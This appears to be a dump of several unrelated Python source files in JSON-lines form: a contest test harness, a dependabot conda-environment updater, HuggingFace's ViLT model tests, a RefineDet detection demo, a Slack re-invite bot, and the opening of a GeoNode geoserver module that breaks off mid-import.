sys.stdout.write(\" Received: \" + pretty_str(__result) + \"\\n\")\n return 0\n\ndef run_tests():\n sys.stdout.write(\"PublicTransit (500 Points)\\n\\n\")\n\n passed = cases = 0\n case_set = set()\n for arg in sys.argv[1:]:\n case_set.add(int(arg))\n\n with open(\"PublicTransit.sample\", \"r\") as f:\n while True:\n label = f.readline()\n if not label.startswith(\"--\"): break\n\n R = int(f.readline().rstrip())\n C = int(f.readline().rstrip())\n f.readline()\n __answer = int(f.readline().rstrip())\n\n cases += 1\n if len(case_set) > 0 and (cases - 1) in case_set: continue\n sys.stdout.write(\" Testcase #%d ... \" % (cases - 1))\n passed += do_test(R, C, __answer)\n\n sys.stdout.write(\"\\nPassed : %d / %d cases\\n\" % (passed, cases))\n\n T = time.time() - 1431783977\n PT, TT = (T / 60.0, 75.0)\n points = 500 * (0.3 + (0.7 * TT * TT) / (10.0 * PT * PT + TT * TT))\n sys.stdout.write(\"Time : %d minutes %d secs\\n\" % (int(T/60), T%60))\n sys.stdout.write(\"Score : %.2f points\\n\" % points)\n\nif __name__ == '__main__':\n run_tests()\n\n# }}}\n# CUT end\n"} {"ext": "py", "sha": "1a2f9570c702e00f26b1a895b9224a12e8a3d770", "content": "# coding: utf-8\n# Copyright (c) Max-Planck-Institut für Eisenforschung GmbH - Computational Materials Design (CM) Department\n# Distributed under the terms of \"New BSD License\", see the LICENSE file.\n\nimport json\nimport re\nimport sys\n\nimport yaml\n\nenvironment_file = '.ci_support/environment.yml'\nname_mapping_file = '.ci_support/pypi_vs_conda_names.json'\n\n\nclass EnvironmentUpdater:\n def __init__(self, package_name, from_version, to_version):\n \"\"\"\n Updates the version of a package in the conda environment file.\n\n Parameters:\n package_name: Name of the package to update as available on PyPI\n from_version: Version the package is before the update\n to_version: Version to which the package should be updated\n \"\"\"\n self.from_version = from_version\n self.to_version = to_version\n with open(name_mapping_file, 'r') as f:\n self._name_conversion_dict = json.load(f)\n\n with open(environment_file, 'r') as f:\n self.environment = yaml.safe_load(f)\n\n self.package_name = self._convert_package_name(package_name)\n\n def _convert_package_name(self, name):\n if name in self._name_conversion_dict.keys():\n result = self._name_conversion_dict[name]\n else:\n result = name\n return result\n\n def _update_dependencies(self):\n updated_dependencies = []\n\n for dep in self.environment['dependencies']:\n updated_dependencies.append(re.sub(\n r'(' + self.package_name + '.*)' + self.from_version,\n r'\\g<1>' + self.to_version,\n dep\n ))\n\n self.environment['dependencies'] = updated_dependencies\n\n def _write(self):\n with open(environment_file, 'w') as f:\n yaml.safe_dump(self.environment, f)\n\n def update_dependencies(self):\n \"\"\"Update the version of the requested dependency in the environment file\"\"\"\n self._update_dependencies()\n self._write()\n\n\nif len(sys.argv) != 7 or not (sys.argv[1] == 'Bump' and sys.argv[3] == 'from' and sys.argv[5] == 'to'):\n raise ValueError(f\"Title of a dependabot PR 'Bump from to ' expected, \"\n f\"but got {' '.join(sys.argv[1:])}\")\npackage_to_update = sys.argv[2]\nfrom_version = sys.argv[4]\nto_version = sys.argv[6]\n\nupdater = EnvironmentUpdater(package_to_update, from_version, to_version)\nupdater.update_dependencies()\n"} {"ext": "py", "sha": "1a2f95d0e6cd940fbc2c94792038478aa5b02563", "content": "# coding=utf-8\n# Copyright 2022 The HuggingFace Inc. team. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\" Testing suite for the PyTorch ViLT model. \"\"\"\n\nimport unittest\n\nfrom datasets import load_dataset\nfrom packaging import version\n\nfrom transformers import ViltConfig, is_torch_available, is_vision_available\nfrom transformers.models.auto import get_values\nfrom transformers.testing_utils import require_torch, require_vision, slow, torch_device\nfrom transformers.utils import cached_property\n\nfrom ...test_configuration_common import ConfigTester\nfrom ...test_modeling_common import ModelTesterMixin, floats_tensor, ids_tensor, random_attention_mask\n\n\nif is_torch_available():\n import torch\n\n from transformers import (\n MODEL_MAPPING,\n ViltForImageAndTextRetrieval,\n ViltForImagesAndTextClassification,\n ViltForMaskedLM,\n ViltForQuestionAnswering,\n ViltModel,\n )\n from transformers.models.vilt.modeling_vilt import VILT_PRETRAINED_MODEL_ARCHIVE_LIST\n\nif is_vision_available():\n import PIL\n from PIL import Image\n\n from transformers import ViltProcessor\n\n\nclass ViltModelTester:\n def __init__(\n self,\n parent,\n batch_size=13,\n seq_length=7,\n image_size=30,\n patch_size=2,\n num_channels=3,\n is_training=True,\n use_input_mask=True,\n use_token_type_ids=True,\n use_labels=True,\n vocab_size=99,\n hidden_size=32,\n num_hidden_layers=5,\n num_attention_heads=4,\n intermediate_size=37,\n hidden_act=\"gelu\",\n hidden_dropout_prob=0.1,\n attention_probs_dropout_prob=0.1,\n max_position_embeddings=512,\n type_vocab_size=16,\n type_sequence_label_size=2,\n initializer_range=0.02,\n num_labels=3,\n scope=None,\n modality_type_vocab_size=2,\n add_multiple_images=False,\n num_images=-1,\n ):\n self.parent = parent\n self.batch_size = batch_size\n self.seq_length = seq_length\n self.image_size = image_size\n self.patch_size = patch_size\n self.num_channels = num_channels\n self.is_training = is_training\n self.use_input_mask = use_input_mask\n self.use_token_type_ids = use_token_type_ids\n self.use_labels = use_labels\n self.vocab_size = vocab_size\n self.hidden_size = hidden_size\n self.num_hidden_layers = num_hidden_layers\n self.num_attention_heads = num_attention_heads\n self.intermediate_size = intermediate_size\n self.hidden_act = hidden_act\n self.hidden_dropout_prob = hidden_dropout_prob\n self.attention_probs_dropout_prob = attention_probs_dropout_prob\n self.max_position_embeddings = max_position_embeddings\n self.type_vocab_size = type_vocab_size\n self.type_sequence_label_size = type_sequence_label_size\n self.initializer_range = initializer_range\n self.num_labels = num_labels\n self.scope = scope\n self.modality_type_vocab_size = modality_type_vocab_size\n self.add_multiple_images = add_multiple_images\n self.num_images = num_images\n # we set the expected sequence length (which is used in several tests)\n # this is equal to the seq length of the text tokens + number of image patches + 1 for the CLS token\n self.expected_seq_len = self.seq_length + (self.image_size // self.patch_size) ** 2 + 1\n\n def prepare_config_and_inputs(self):\n input_ids = ids_tensor([self.batch_size, self.seq_length], self.vocab_size)\n if self.add_multiple_images:\n pixel_values = floats_tensor([self.batch_size, 2, self.num_channels, self.image_size, self.image_size])\n else:\n pixel_values = floats_tensor([self.batch_size, self.num_channels, self.image_size, self.image_size])\n\n input_mask = None\n if self.use_input_mask:\n input_mask = random_attention_mask([self.batch_size, self.seq_length])\n\n token_type_ids = None\n if self.use_token_type_ids:\n token_type_ids = ids_tensor([self.batch_size, self.seq_length], self.type_vocab_size)\n\n if self.use_labels:\n token_labels = ids_tensor([self.batch_size, self.seq_length], self.num_labels)\n\n config = self.get_config()\n\n return (config, input_ids, token_type_ids, input_mask, pixel_values, token_labels)\n\n def get_config(self):\n return ViltConfig(\n image_size=self.image_size,\n patch_size=self.patch_size,\n num_channels=self.num_channels,\n vocab_size=self.vocab_size,\n hidden_size=self.hidden_size,\n num_hidden_layers=self.num_hidden_layers,\n num_attention_heads=self.num_attention_heads,\n intermediate_size=self.intermediate_size,\n hidden_act=self.hidden_act,\n hidden_dropout_prob=self.hidden_dropout_prob,\n attention_probs_dropout_prob=self.attention_probs_dropout_prob,\n max_position_embeddings=self.max_position_embeddings,\n type_vocab_size=self.type_vocab_size,\n is_decoder=False,\n initializer_range=self.initializer_range,\n num_labels=self.num_labels,\n modality_type_vocab_size=self.modality_type_vocab_size,\n num_images=self.num_images,\n )\n\n def create_and_check_model(\n self,\n config,\n input_ids,\n token_type_ids,\n input_mask,\n pixel_values,\n token_labels,\n ):\n model = ViltModel(config=config)\n model.to(torch_device)\n model.eval()\n result = model(input_ids, attention_mask=input_mask, token_type_ids=token_type_ids, pixel_values=pixel_values)\n result = model(input_ids, token_type_ids=token_type_ids, pixel_values=pixel_values)\n result = model(input_ids, pixel_values=pixel_values)\n self.parent.assertEqual(\n result.last_hidden_state.shape, (self.batch_size, self.expected_seq_len, self.hidden_size)\n )\n\n def prepare_config_and_inputs_for_common(self):\n config_and_inputs = self.prepare_config_and_inputs()\n (\n config,\n input_ids,\n token_type_ids,\n input_mask,\n pixel_values,\n token_labels,\n ) = config_and_inputs\n inputs_dict = {\n \"input_ids\": input_ids,\n \"token_type_ids\": token_type_ids,\n \"attention_mask\": input_mask,\n \"pixel_values\": pixel_values,\n }\n return config, inputs_dict\n\n def prepare_pixel_values(self):\n return floats_tensor([self.batch_size, self.num_channels, self.image_size, self.image_size])\n\n\n@require_torch\nclass ViltModelTest(ModelTesterMixin, unittest.TestCase):\n\n all_model_classes = (\n (\n ViltModel,\n ViltForQuestionAnswering,\n ViltForImageAndTextRetrieval,\n ViltForMaskedLM,\n )\n if is_torch_available()\n else ()\n )\n test_pruning = False\n test_headmasking = False\n test_torchscript = False\n\n # ViltForMaskedLM, ViltForQuestionAnswering and ViltForImagesAndTextClassification require special treatment\n def _prepare_for_class(self, inputs_dict, model_class, return_labels=False):\n inputs_dict = super()._prepare_for_class(inputs_dict, model_class, return_labels=return_labels)\n\n # if model_class.__name__ == \"ViltForNaturalLanguageVisualReasonining\":\n # inputs_dict[\"pixel_values\"] = floats_tensor([self.model_tester.batch_size, self.model_tester.num_images, self.model_tester.num_channels, self.model_tester.image_size, self.model_tester.image_size])\n\n if return_labels:\n if model_class.__name__ == \"ViltForQuestionAnswering\":\n inputs_dict[\"labels\"] = torch.zeros(\n self.model_tester.batch_size, self.model_tester.num_labels, device=torch_device\n )\n elif model_class.__name__ == \"ViltForMaskedLM\":\n inputs_dict[\"labels\"] = torch.zeros(\n (self.model_tester.batch_size, self.model_tester.seq_length), dtype=torch.long, device=torch_device\n )\n elif model_class.__name__ == \"ViltForImagesAndTextClassification\":\n inputs_dict[\"labels\"] = torch.zeros(\n self.model_tester.batch_size, dtype=torch.long, device=torch_device\n )\n\n return inputs_dict\n\n def setUp(self):\n self.model_tester = ViltModelTester(self)\n self.config_tester = ConfigTester(self, config_class=ViltConfig, hidden_size=37)\n\n def test_config(self):\n self.config_tester.run_common_tests()\n\n def test_model(self):\n config_and_inputs = self.model_tester.prepare_config_and_inputs()\n self.model_tester.create_and_check_model(*config_and_inputs)\n\n def test_training(self):\n if not self.model_tester.is_training:\n return\n\n for model_class in self.all_model_classes:\n config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()\n config.return_dict = True\n\n if model_class.__name__ == \"ViltForImagesAndTextClassification\":\n config.modality_type_vocab_size = 3\n\n # ViltForImageAndTextRetrieval doesn't support training for now\n if model_class in [*get_values(MODEL_MAPPING), ViltForImageAndTextRetrieval]:\n continue\n\n model = model_class(config)\n model.to(torch_device)\n model.train()\n inputs = self._prepare_for_class(inputs_dict, model_class, return_labels=True)\n for k, v in inputs.items():\n print(k, v.shape)\n loss = model(**inputs).loss\n loss.backward()\n\n def test_training_gradient_checkpointing(self):\n if not self.model_tester.is_training:\n return\n\n for model_class in self.all_model_classes:\n config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()\n config.use_cache = False\n config.return_dict = True\n\n # ViltForImageAndTextRetrieval doesn't support training for now\n if (\n model_class in [*get_values(MODEL_MAPPING), ViltForImageAndTextRetrieval]\n or not model_class.supports_gradient_checkpointing\n ):\n continue\n\n model = model_class(config)\n model.to(torch_device)\n model.gradient_checkpointing_enable()\n model.train()\n inputs = self._prepare_for_class(inputs_dict, model_class, return_labels=True)\n loss = model(**inputs).loss\n loss.backward()\n\n @unittest.skip(\n reason=\"\"\"VilT samples image tokens from a multinomial distribution, resulting in not deterministic\n hidden states\"\"\"\n )\n def test_save_load(self):\n pass\n\n @unittest.skip(\n reason=\"\"\"VilT samples image tokens from a multinomial distribution, resulting in not deterministic\n hidden states\"\"\"\n )\n def test_determinism(self):\n pass\n\n @unittest.skip(\n reason=\"\"\"VilT samples image tokens from a multinomial distribution, resulting in not deterministic\n hidden states\"\"\"\n )\n def test_model_outputs_equivalence(self):\n pass\n\n def test_attention_outputs(self):\n config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()\n config.return_dict = True\n\n seq_len = getattr(self.model_tester, \"expected_seq_len\", None)\n\n for model_class in self.all_model_classes:\n inputs_dict[\"output_attentions\"] = True\n inputs_dict[\"output_hidden_states\"] = False\n config.return_dict = True\n model = model_class(config)\n model.to(torch_device)\n model.eval()\n with torch.no_grad():\n outputs = model(**self._prepare_for_class(inputs_dict, model_class))\n attentions = outputs.attentions\n if model_class.__name__ == \"ViltForImagesAndTextClassification\":\n # attentions are a list of length num_images\n # each element contains the attentions of a particular image index\n self.assertEqual(len(attentions), self.model_tester.num_images)\n self.assertEqual(len(attentions[0]), self.model_tester.num_hidden_layers)\n else:\n self.assertEqual(len(attentions), self.model_tester.num_hidden_layers)\n\n # check that output_attentions also work using config\n del inputs_dict[\"output_attentions\"]\n config.output_attentions = True\n model = model_class(config)\n model.to(torch_device)\n model.eval()\n with torch.no_grad():\n outputs = model(**self._prepare_for_class(inputs_dict, model_class))\n attentions = outputs.attentions\n if model_class.__name__ == \"ViltForImagesAndTextClassification\":\n # attentions are a list of length num_images\n # each element contains the attentions of a particular image index\n self.assertEqual(len(attentions), self.model_tester.num_images)\n self.assertEqual(len(attentions[0]), self.model_tester.num_hidden_layers)\n else:\n self.assertEqual(len(attentions), self.model_tester.num_hidden_layers)\n\n if model_class.__name__ == \"ViltForImagesAndTextClassification\":\n self.assertListEqual(\n list(attentions[0][0].shape[-3:]),\n [self.model_tester.num_attention_heads, seq_len, seq_len],\n )\n else:\n self.assertListEqual(\n list(attentions[0].shape[-3:]),\n [self.model_tester.num_attention_heads, seq_len, seq_len],\n )\n out_len = len(outputs)\n\n # Check attention is always last and order is fine\n inputs_dict[\"output_attentions\"] = True\n inputs_dict[\"output_hidden_states\"] = True\n model = model_class(config)\n model.to(torch_device)\n model.eval()\n with torch.no_grad():\n outputs = model(**self._prepare_for_class(inputs_dict, model_class))\n\n self.assertEqual(out_len + 1, len(outputs))\n\n self_attentions = outputs.encoder_attentions if config.is_encoder_decoder else outputs.attentions\n\n if model_class.__name__ == \"ViltForImagesAndTextClassification\":\n self.assertEqual(len(self_attentions), self.model_tester.num_images)\n self.assertEqual(len(self_attentions[0]), self.model_tester.num_hidden_layers)\n self.assertListEqual(\n list(self_attentions[0][0].shape[-3:]),\n [self.model_tester.num_attention_heads, seq_len, seq_len],\n )\n else:\n self.assertEqual(len(self_attentions), self.model_tester.num_hidden_layers)\n self.assertListEqual(\n list(self_attentions[0].shape[-3:]),\n [self.model_tester.num_attention_heads, seq_len, seq_len],\n )\n\n def test_hidden_states_output(self):\n def check_hidden_states_output(inputs_dict, config, model_class):\n model = model_class(config)\n model.to(torch_device)\n model.eval()\n\n with torch.no_grad():\n outputs = model(**self._prepare_for_class(inputs_dict, model_class))\n\n hidden_states = outputs.encoder_hidden_states if config.is_encoder_decoder else outputs.hidden_states\n\n expected_num_layers = getattr(\n self.model_tester, \"expected_num_hidden_layers\", self.model_tester.num_hidden_layers + 1\n )\n if model_class.__name__ == \"ViltForImagesAndTextClassification\":\n # hidden_states are a list of length num_images\n # each element contains the hidden states of a particular image index\n self.assertEqual(len(hidden_states), self.model_tester.num_images)\n self.assertEqual(len(hidden_states[0]), expected_num_layers)\n else:\n self.assertEqual(len(hidden_states), expected_num_layers)\n\n seq_length = self.model_tester.expected_seq_len\n\n if model_class.__name__ == \"ViltForImagesAndTextClassification\":\n self.assertListEqual(\n list(hidden_states[0][0].shape[-2:]),\n [seq_length, self.model_tester.hidden_size],\n )\n else:\n self.assertListEqual(\n list(hidden_states[0].shape[-2:]),\n [seq_length, self.model_tester.hidden_size],\n )\n\n config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()\n\n for model_class in self.all_model_classes:\n print(\"Model class:\", model_class)\n inputs_dict[\"output_hidden_states\"] = True\n check_hidden_states_output(inputs_dict, config, model_class)\n\n # check that output_hidden_states also work using config\n del inputs_dict[\"output_hidden_states\"]\n config.output_hidden_states = True\n\n check_hidden_states_output(inputs_dict, config, model_class)\n\n def test_retain_grad_hidden_states_attentions(self):\n config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()\n config.output_hidden_states = True\n config.output_attentions = True\n\n # no need to test all models as different heads yield the same functionality\n model_class = self.all_model_classes[0]\n model = model_class(config)\n model.to(torch_device)\n\n inputs = self._prepare_for_class(inputs_dict, model_class)\n\n outputs = model(**inputs)\n\n output = outputs[0]\n\n # Encoder-/Decoder-only models\n hidden_states = outputs.hidden_states[0]\n attentions = outputs.attentions[0]\n\n if model_class.__name__ == \"ViltForImagesAndTextClassification\":\n # hidden_states are a list of length num_images\n # each element contains the hidden states of a particular image index\n hidden_states[0].retain_grad()\n attentions[0].retain_grad()\n else:\n hidden_states.retain_grad()\n attentions.retain_grad()\n\n output.flatten()[0].backward(retain_graph=True)\n\n if model_class.__name__ == \"ViltForImagesAndTextClassification\":\n # hidden_states are a list of length num_images\n # each element contains the hidden states of a particular image index\n self.assertIsNotNone(hidden_states[0].grad)\n self.assertIsNotNone(attentions[0].grad)\n else:\n self.assertIsNotNone(hidden_states.grad)\n self.assertIsNotNone(attentions.grad)\n\n @slow\n def test_model_from_pretrained(self):\n for model_name in VILT_PRETRAINED_MODEL_ARCHIVE_LIST[:1]:\n model = ViltModel.from_pretrained(model_name)\n self.assertIsNotNone(model)\n\n\n@require_torch\nclass ViltForImagesAndTextClassificationModelTest(ViltModelTest, unittest.TestCase):\n\n all_model_classes = (ViltForImagesAndTextClassification,) if is_torch_available() else ()\n\n def setUp(self):\n self.model_tester = ViltModelTester(self, modality_type_vocab_size=3, add_multiple_images=True, num_images=2)\n self.config_tester = ConfigTester(self, config_class=ViltConfig, hidden_size=37)\n\n @unittest.skip(\"We only test the model that takes in multiple images\")\n def test_model(self):\n pass\n\n\n# We will verify our results on an image of cute cats\ndef prepare_img():\n image = Image.open(\"./tests/fixtures/tests_samples/COCO/000000039769.png\")\n return image\n\n\n@require_torch\n@require_vision\nclass ViltModelIntegrationTest(unittest.TestCase):\n @cached_property\n def default_processor(self):\n return ViltProcessor.from_pretrained(\"dandelin/vilt-b32-finetuned-vqa\") if is_vision_available() else None\n\n @slow\n def test_inference_masked_lm(self):\n model = ViltForMaskedLM.from_pretrained(\"dandelin/vilt-b32-mlm\").to(torch_device)\n\n processor = self.default_processor\n image = prepare_img()\n text = \"a bunch of [MASK] laying on a [MASK].\"\n inputs = processor(image, text, return_tensors=\"pt\").to(torch_device)\n\n # forward pass\n with torch.no_grad():\n outputs = model(**inputs)\n\n # verify the logits\n expected_shape = torch.Size([1, 11, 30522])\n self.assertEqual(outputs.logits.shape, expected_shape)\n\n expected_slice = torch.tensor([-12.5061, -12.5123, -12.5174]).to(torch_device)\n self.assertTrue(torch.allclose(outputs.logits[0, 0, :3], expected_slice, atol=1e-4))\n\n # verify masked token prediction equals \"cats\"\n predicted_id = outputs.logits[0, 4, :].argmax(-1).item()\n assert processor.decode([predicted_id]) == \"cats\"\n\n @slow\n def test_inference_visual_question_answering(self):\n model = ViltForQuestionAnswering.from_pretrained(\"dandelin/vilt-b32-finetuned-vqa\").to(torch_device)\n\n processor = self.default_processor\n image = prepare_img()\n text = \"How many cats are there?\"\n inputs = processor(image, text, return_tensors=\"pt\").to(torch_device)\n\n # forward pass\n with torch.no_grad():\n outputs = model(**inputs)\n\n # verify the logits\n expected_shape = torch.Size((1, 3129))\n self.assertEqual(outputs.logits.shape, expected_shape)\n\n expected_slice = torch.tensor([-15.9495, -18.1472, -10.3041]).to(torch_device)\n\n self.assertTrue(torch.allclose(outputs.logits[0, :3], expected_slice, atol=1e-4))\n\n # compute loss\n vqa_labels = [[2, 3, 155, 800]]\n vqa_scores = [[1.0, 0.3, 0.3, 0.3]]\n labels = torch.zeros(1, model.config.num_labels).to(torch_device)\n\n for i, (labels_example, scores_example) in enumerate(zip(vqa_labels, vqa_scores)):\n for l, s in zip(labels_example, scores_example):\n labels[i, l] = s\n\n # forward pass\n outputs = model(**inputs, labels=labels)\n\n # verify we have a positive loss\n self.assertTrue(outputs.loss > 0)\n\n @slow\n def test_inference_natural_language_visual_reasoning(self):\n model = ViltForImagesAndTextClassification.from_pretrained(\"dandelin/vilt-b32-finetuned-nlvr2\").to(\n torch_device\n )\n\n processor = self.default_processor\n\n dataset = load_dataset(\"hf-internal-testing/fixtures_nlvr2\", split=\"test\")\n image1 = Image.open(dataset[0][\"file\"]).convert(\"RGB\")\n image2 = Image.open(dataset[1][\"file\"]).convert(\"RGB\")\n\n text = (\n \"The left image contains twice the number of dogs as the right image, and at least two dogs in total are\"\n \" standing.\"\n )\n encoding_1 = processor(image1, text, return_tensors=\"pt\")\n encoding_2 = processor(image2, text, return_tensors=\"pt\")\n\n pixel_values = torch.stack([encoding_1.pixel_values, encoding_2.pixel_values], dim=1)\n\n # forward pass\n outputs = model(\n input_ids=encoding_1.input_ids.to(torch_device),\n pixel_values=pixel_values.to(torch_device),\n )\n\n # verify the logits\n expected_shape = torch.Size([1, 2])\n self.assertEqual(outputs.logits.shape, expected_shape)\n\n is_pillow_less_than_9 = version.parse(PIL.__version__) < version.parse(\"9.0.0\")\n\n if is_pillow_less_than_9:\n expected_slice = torch.tensor(\n [-2.4013, 2.9342],\n device=torch_device,\n )\n else:\n expected_slice = torch.tensor(\n [-2.3713, 2.9168],\n device=torch_device,\n )\n\n self.assertTrue(torch.allclose(outputs.logits[0, :3], expected_slice, atol=1e-4))\n"} {"ext": "py", "sha": "1a2f967b054e32f7b45c3c4250d576604c6a17e5", "content": "import os\nimport sys\nmodule_path = os.path.abspath(os.path.join('../models/'))\nprint(module_path)\nif module_path not in sys.path:\n sys.path.append(module_path)\n\nimport torch\nimport torch.nn as nn\nimport torch.backends.cudnn as cudnn\nfrom torch.autograd import Variable\nimport numpy as np\nimport cv2\nimport time\n\nif torch.cuda.is_available():\n torch.set_default_tensor_type('torch.cuda.FloatTensor')\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\"\nsize = 320\n# from refinedet import build_refinedet\n# from models.multitrident_refinedet_v2 import build_multitridentrefinedet\nfrom models.multitrident_refinedet import build_multitridentrefinedet\nnet = build_multitridentrefinedet('test', size, 21) # initialize SSD\n# net = build_refinedet('test', 512, 21)\n# net.load_weights('../weights/RefineDet512_VOC_final.pth')\n# net.load_weights('../weights/experiment/320*320/exp_4_[256relufpn][0.3_0.6][mAP_0.77][dilate:11111-12333-12555]/RefineDet320_VOC_275000.pth')\nnet.load_weights('../weights/experiment/320*320/RefineDet320_VOC_315000.pth')\n\n\"\"\"000210 000111 000144 009539 009589 000069 009539 001275 002333 002338 002341 \n002695 002713 003681 003874 003673 003740\"\"\"\nim_names = \"002695.jpg\"\n\n\nimage_file = '/home/yiling/data/VOCdevkit/VOC2007/JPEGImages/' + im_names\nimage = cv2.imread(image_file, cv2.IMREAD_COLOR) # uncomment if dataset not download\n#%matplotlib inline\nfrom matplotlib import pyplot as plt\nfrom data import VOCDetection, VOC_ROOT, VOCAnnotationTransform\n# here we specify year (07 or 12) and dataset ('test', 'val', 'train')\ntestset = VOCDetection(VOC_ROOT, [('2007', 'val')], None, VOCAnnotationTransform())\nimg_id = 62\n# image = testset.pull_image(img_id)\nrgb_image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n# View the sampled input image before transform\nplt.figure(figsize=(10,10))\n# plt.imshow(rgb_image)\n# plt.show()\n\nx = cv2.resize(image, (size, size)).astype(np.float32)\nx -= (104.0, 117.0, 123.0)\nx = x.astype(np.float32)\nx = x[:, :, ::-1].copy()\n# plt.imshow(x)\nx = torch.from_numpy(x).permute(2, 0, 1)\n\n\nxx = Variable(x.unsqueeze(0)) # wrap tensor in Variable\nif torch.cuda.is_available():\n xx = xx.cuda()\nstart = time.time()\ny = net(xx)\nend = time.time()\nprint(end-start)\n\nfrom data import VOC_CLASSES as labels\ntop_k=100\n\nplt.figure(figsize=(10,10))\ncolors = plt.cm.hsv(np.linspace(0, 1, 21)).tolist()\nplt.imshow(rgb_image) # plot the image for matplotlib\ncurrentAxis = plt.gca()\n\n\ndetections = y.data\n\n\n# scale each detection back up to the image\nscale = torch.Tensor(rgb_image.shape[1::-1]).repeat(2)\nfor i in range(detections.size(1)):\n for j in range(detections.size(2)):\n if detections[0,i,j,0] > 0.05:\n score = detections[0, i, j, 0]\n label_name = labels[i - 1]\n display_txt = '%s: %.2f' % (label_name, score)\n pt = (detections[0, i, j, 1:] * scale).cpu().numpy()\n coords = (pt[0], pt[1]), pt[2] - pt[0] + 1, pt[3] - pt[1] + 1\n color = colors[i]\n currentAxis.add_patch(plt.Rectangle(*coords, fill=False, edgecolor=color, linewidth=2))\n currentAxis.text(pt[0], pt[1], display_txt, bbox={'facecolor': color, 'alpha': 0.5})\n else:\n continue\n # j = 0\n # while detections[0,i,j,0] >= -1:\n # score = detections[0,i,j,0]\n # label_name = labels[i-1]\n # display_txt = '%s: %.2f'%(label_name, score)\n # pt = (detections[0,i,j,1:]*scale).cpu().numpy()\n # coords = (pt[0], pt[1]), pt[2]-pt[0]+1, pt[3]-pt[1]+1\n # color = colors[i]\n # currentAxis.add_patch(plt.Rectangle(*coords, fill=False, edgecolor=color, linewidth=2))\n # currentAxis.text(pt[0], pt[1], display_txt, bbox={'facecolor':color, 'alpha':0.5})\n # j+=1\n\nplt.show()\n\n\n\n\n"} {"ext": "py", "sha": "1a2f97cb5a5f68eb19cc8985425d3d2948e80c3c", "content": "# -*- coding: utf-8 -*-\n\"\"\"\nPython Slack Bot class for use with the pythOnBoarding app\n\"\"\"\nimport os\n\nfrom slackclient import SlackClient\n\n# To remember which teams have authorized your app and what tokens are\n# associated with each team, we can store this information in memory on\n# as a global object. When your bot is out of development, it's best to\n# save this in a more persistant memory store.\nauthed_teams = {}\n\n\nclass Bot(object):\n \"\"\" Instanciates a Bot object to handle Slack onboarding interactions.\"\"\"\n def __init__(self):\n super(Bot, self).__init__()\n self.name = \"come_back_here\"\n self.emoji = \":robot_face:\"\n # When we instantiate a new bot object, we can access the app\n # credentials we set earlier in our local development environment.\n self.oauth = {\"client_id\": os.environ.get(\"CLIENT_ID\"),\n \"client_secret\": os.environ.get(\"CLIENT_SECRET\"),\n # Scopes provide and limit permissions to what our app\n # can access. It's important to use the most restricted\n # scope that your app will need.\n \"scope\": \"users.profile:read\"}\n self.oauth\n self.verification = os.environ.get(\"VERIFICATION_TOKEN\")\n\n # NOTE: Python-slack requires a client connection to generate\n # an oauth token. We can connect to the client without authenticating\n # by passing an empty string as a token and then reinstantiating the\n # client with a valid OAuth token once we have one.\n self.client = SlackClient(\"\")\n # We'll use this dictionary to store the state of each message object.\n # In a production envrionment you'll likely want to store this more\n # persistantly in a database.\n self.messages = {}\n\n def auth(self, code):\n \"\"\"\n Authenticate with OAuth and assign correct scopes.\n Save a dictionary of authed team information in memory on the bot\n object.\n\n Parameters\n ----------\n code : str\n temporary authorization code sent by Slack to be exchanged for an\n OAuth token\n\n \"\"\"\n # After the user has authorized this app for use in their Slack team,\n # Slack returns a temporary authorization code that we'll exchange for\n # an OAuth token using the oauth.access endpoint\n auth_response = self.client.api_call(\n \"oauth.access\",\n client_id=self.oauth[\"client_id\"],\n client_secret=self.oauth[\"client_secret\"],\n code=code\n )\n # To keep track of authorized teams and their associated OAuth tokens,\n # we will save the team ID and bot tokens to the global\n # authed_teams object\n team_id = auth_response[\"team_id\"]\n authed_teams[team_id] = {\"bot_token\":\n auth_response[\"access_token\"]}\n # Then we'll reconnect to the Slack Client with the correct team's\n # bot token\n self.client = SlackClient(authed_teams[team_id][\"bot_token\"])\n\n def bring_back_user(self, user_id, channel, token):\n \"\"\"\n Create and send an onboarding welcome message to new users. Save the\n time stamp of this message on the message object for updating in the\n future.\n\n Parameters\n ----------\n team_id : str\n id of the Slack team associated with the incoming event\n user_id : str\n id of the Slack user associated with the incoming event\n\n \"\"\"\n # We'll use the message object's method to create the attachments that\n # we'll want to add to our Slack message. This method will also save\n # the attachments on the message object which we're accessing in the\n # API call below through the message object's `attachments` attribute.\n text = \"Hey... get back here <@\" + str(user_id) + \">\"\n self.client.api_call(\n \"chat.postMessage\",\n channel=channel,\n token=token,\n username=self.name,\n icon_emoji=self.emoji,\n text=text\n )\n self.client.api_call(\"channels.invite\", token=token, channel=channel, user=user_id)\n"} {"ext": "py", "sha": "1a2f981b3f5cd8e4906825f0c625333ed02f4993", "content": "# -*- coding: utf-8 -*-\n#########################################################################\n#\n# Copyright (C) 2016 OSGeo\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n#\n#########################################################################\nimport errno\nimport logging\n\nfrom geoserver.layer import Layer as GsLayer\n\nfrom django.conf import settings\nfrom django.dispatch import receiver, Signal\nfrom django.forms.models import model_to_dict\nfrom django.contrib.staticfiles.templatetags import staticfiles\n\n# use different name to avoid module clash\nfrom geonode.utils import (\n is_monochromatic_image,\n json_serializer_producer)\nfrom geonode.decorators import on_ogc_backend\nfrom geonode.geoserver.helpers import (\n gs_catalog,\n ogc_server_settings)\nfrom geonode.geoserver.tasks import geoserver_create_thumbnail\nfrom geonode.layers.models import Layer\nfrom 